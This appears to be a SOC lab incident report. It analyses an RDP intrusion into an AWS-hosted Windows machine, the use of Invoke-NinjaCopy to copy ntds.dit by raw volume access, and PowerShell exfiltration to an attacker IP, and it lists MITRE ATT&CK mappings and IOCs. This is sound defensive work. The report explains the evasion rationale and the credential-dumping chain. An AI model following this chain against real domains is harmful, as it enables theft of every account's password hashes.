🔍 What
An attacker from 185.107.56.72 RDP’d directly to host Paul via its externally exposed AWS-facing NIC (172.31.30.36 / EC2AMAZ-ILGVOIN.us-east-2.compute.internal), confirmed by Sysmon Event ID 3 with Initiated: false and DestinationPort: 3389. Paul is a dual-NIC AWS EC2 instance — visible on the internal network as 172.16.17.223 and reachable externally via its VPC NIC at 172.31.30.36. The logon type 3 and 7 events reflect RDP session authentication to Paul directly, not lateral movement from a separate host.
Following RDP access, the attacker downloaded Invoke-NinjaCopy.ps1 to C:\temp and used it to copy ntds.dit via raw NTFS volume access — bypassing Windows file API hooks that security tooling relies on. The staged file was exfiltrated via PowerShell Invoke-WebRequest POST to the attacker’s server at 185.107.56.72:8000/upload. Device action was Allowed at time of detection. Endpoint has been isolated.
🕐 When
Aug 23, 2024, 12:17:26 PM — Sysmon Event ID 3 confirms inbound RDP from 185.107.56.72 to Paul’s AWS NIC (172.31.30.36) on port 3389Aug 23, 2024, ~12:17 PM — Logon type 3 and 7 on Paul — RDP session authentication under letsdefend accountAug 23, 2024, 12:19 PM — Alert triggered on NinjaCopy executionntds.dit copied to C:\temp\ntds.dit and exfiltrated to 185.107.56.72:8000/upload📍 Where
172.16.17.223172.31.30.36 (EC2AMAZ-ILGVOIN.us-east-2.compute.internal)185.107.56.72C:\temp\ntds.dithttps://185.107.56.72:8000/upload👤 Who
External attacker from 185.107.56.72, flagged malicious on AbuseIPDB. The attacker accessed Paul directly through its AWS-facing NIC, which was reachable from the internet — bypassing perimeter controls monitoring the internal network. Compromised account letsdefend was used to authenticate the RDP session. The anomalous RuntimeBroker.exe → powershell.exe parent-child relationship observed post-RDP access is consistent with DCOM-based execution.
❓ Why
The attacker’s objective was Active Directory credential harvesting. Paul’s dual-NIC configuration — with one interface exposed to the internet via AWS — provided a direct entry point that circumvented internal perimeter monitoring. NinjaCopy was chosen specifically over conventional tools (ntdsutil, vssadmin) because it reads raw NTFS volume data, making the file copy invisible to API-level monitoring. The exfiltrated ntds.dit enables offline extraction of all domain account password hashes for cracking or pass-the-hash attacks.
🎯 MITRE ATT&CK
| ID | Tactic | Technique |
|---|---|---|
| T1021.001 | Initial Access | Remote Services: Remote Desktop Protocol |
| T1078 | Initial Access | Valid Accounts |
| T1059.001 | Execution | Command and Scripting Interpreter: PowerShell |
| T1006 | Defense Evasion | Direct Volume Access |
| T1003.003 | Credential Access | OS Credential Dumping: NTDS |
| T1048.002 | Exfiltration | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol |
📋 IOCs
| Type | Value | Context |
|---|---|---|
| IP | 185.107.56.72 |
Attacker IP — RDP source and exfil server, AbuseIPDB flagged malicious |
| IP | 172.31.30.36 |
Paul’s AWS-facing NIC — externally reachable RDP entry point |
| URL | https://185.107.56.72:8000/upload |
Exfil POST destination |
| File | C:\temp\ntds.dit |
Staged copy of AD database |
| File | C:\temp\Invoke-NinjaCopy.ps1 |
PowerSploit tool used for direct volume access |
| Hash | 975803E4B80DB0C3B3C8A1E8074DA3F5A5C77C710CBF96DE38CAF9744DD76C9B |
SHA256 of Invoke-NinjaCopy.ps1 |
| Account | letsdefend |
Compromised account used for RDP authentication |
| Process | RuntimeBroker.exe → powershell.exe |
Anomalous parent-child — consistent with DCOM abuse |
🔬 Analysis Reports 🦠 VirusTotal https://www.virustotal.com/gui/url/de79c92942c8114779bafd424e2d19526e10e43cb0d091749b9dfa710c8306c3
https://www.virustotal.com/gui/file/975803e4b80db0c3b3c8a1e8074da3f5a5c77c710cbf96de38caf9744dd76c9b
https://www.abuseipdb.com/check/185.107.56.72?page=2